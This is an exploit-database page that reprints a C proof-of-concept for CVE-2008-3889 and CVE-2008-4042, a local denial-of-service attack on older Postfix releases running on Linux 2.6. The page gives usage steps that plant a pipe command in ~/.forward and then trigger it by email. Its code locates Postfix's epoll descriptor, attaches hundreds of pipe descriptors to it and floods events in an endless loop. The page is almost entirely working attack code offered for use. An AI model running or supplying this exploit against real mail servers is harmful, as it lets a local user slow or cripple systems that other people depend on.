Postfix < 2.4.9, 2.5.5, 2.6-20080902 - (.forward) Local DoS Exploit

2014-07-0100:00:00

Root

www.seebug.org

0.002 Low

EPSS

Percentile

60.0%

JSON

No description provided by source.


                                                /*
 * http://www.wekk.net/research/CVE-2008-4042/CVE-2008-4042-exploit.c
 * http://www.wekk.net/research/CVE-2008-3889/CVE-2008-3889-exploit.c
 *
 * Exploit for Postfix 2.4 before 2.4.9, 2.5 before 2.5.5, and 2.6 
 * before 2.6-20080902, when used with the Linux 2.6 kernel.
 *
 * CVE-2008-3889 & CVE-2008-4042
 *
 * by Albert Sellarès &#60;whats[at]wekk[dot]net&#62; - http://www.wekk.net
 * and Marc Morata Fité &#60;marc.morata.fite[at]gmail[dot]com&#62; 
 * 2008-09-16
 *
 * This Proof of concept creates a pipe and adds it in the postfix&#39;s epoll 
 * file descriptor.
 * When the pipe is added, an endless loop will launch lots of events to the 
 * local and master postfix processes. 
 * This will slowdown de system a lot.
 *
 * An example of use:
 * 1- Put the content &#34;| ~/CVE-2008-3889-exploit &#62;&#62; /tmp/postfix.log &&#34; (with 
 * the double quotes) 
 * in the file ~/.forward
 *
 * 2- Put the CVE-2008-4042-exploit in your home
 * gcc CVE-2008-3889-exploit.c -o CVE-2008-3889-exploit
 *
 * 3- Send and email to the user
 *
 * You can see the output at /tmp/postfix.log
 */


#include &#60;sys/epoll.h&#62;
#include &#60;stdio.h&#62;
#include &#60;stdlib.h&#62;
#include &#60;string.h&#62;
#include &#60;stdio.h&#62;
#include &#60;sys/types.h&#62;
#include &#60;sys/stat.h&#62;
#include &#60;unistd.h&#62;
#include &#60;dirent.h&#62;
#include &#60;errno.h&#62;

#define FDOPEN 200


void add_fd(int fde, int fd) {
	printf(&#34;[*] Adding fd %d to eventpoll %d\n&#34;, fd, fde);
	static struct epoll_event ev;
	ev.events = EPOLLIN|EPOLLOUT|EPOLLPRI|EPOLLERR|EPOLLHUP|EPOLLET;
	errno =0;
	// If this is a socket fd, the load is high
	ev.data.u32 = 6;
	ev.data.u64 = 6;

	if (epoll_ctl(fde, EPOLL_CTL_ADD, fd, &ev) == 0) {
		printf(&#34; =&#62; Fd %d added!\n&#34;, fd);
	} else {
		printf(&#34; =&#62; Error (%d) adding fd %d\n&#34;, errno, fd);
	}
}

int main(int argc, char *argv[]) {

	int fds[2];
	char dir[32], c;
	int i, found = 0;

	pipe(fds);
	sprintf(dir, &#34;/proc/%d/fd&#34;, getpid());
	printf(&#34;[*] Opening directory %s\n&#34;, dir);
	DIR *fd_dir = opendir(dir);
	struct dirent *de = readdir(fd_dir);

	// We are looking for the eventpoll file descriptor
	while (de != NULL) {
		char link_d[256];
		char link_f[256];
		memset(link_d, 0, 256);
		sprintf(link_f, &#34;%s/%s&#34;, dir, de-&#62;d_name);
		readlink(link_f, link_d, 256);
		if ( strstr(link_d, &#34;eventpoll&#34;) ) {
			found = 1;
			printf(&#34; =&#62; %s points to %s\n&#34;, de-&#62;d_name, link_d);
			add_fd(atoi(de-&#62;d_name), fds[0]);
			// We can test with more than one triggered event at once
			for (i = 0; i&#60;FDOPEN; i++)
				add_fd(atoi(de-&#62;d_name),dup(fds[0]));
		}
		de = readdir(fd_dir);
	}
	closedir(fd_dir);
	
	if (found == 0) {
		printf(&#34;[!] Are you sure that your postfix is vulnerable?\n&#34;);
		printf(&#34;[!] Are you launching me throw a .forward file?\n&#34;);
		exit(0);
	}
	
	printf(&#34;[*] Starting to flood the system!\n&#34;);
	fflush(stdout);
	close(0);
	close(1);
	close(2);

	// This triggers the events
	while (1) {
		write(fds[1], &#34;A&#34;,1);
		read(fds[0],&c, 1);
	}

	return 0;
}

// milw0rm.com [2008-09-16]

0.002 Low

EPSS

Percentile

60.0%

JSON

Related for SSV:65714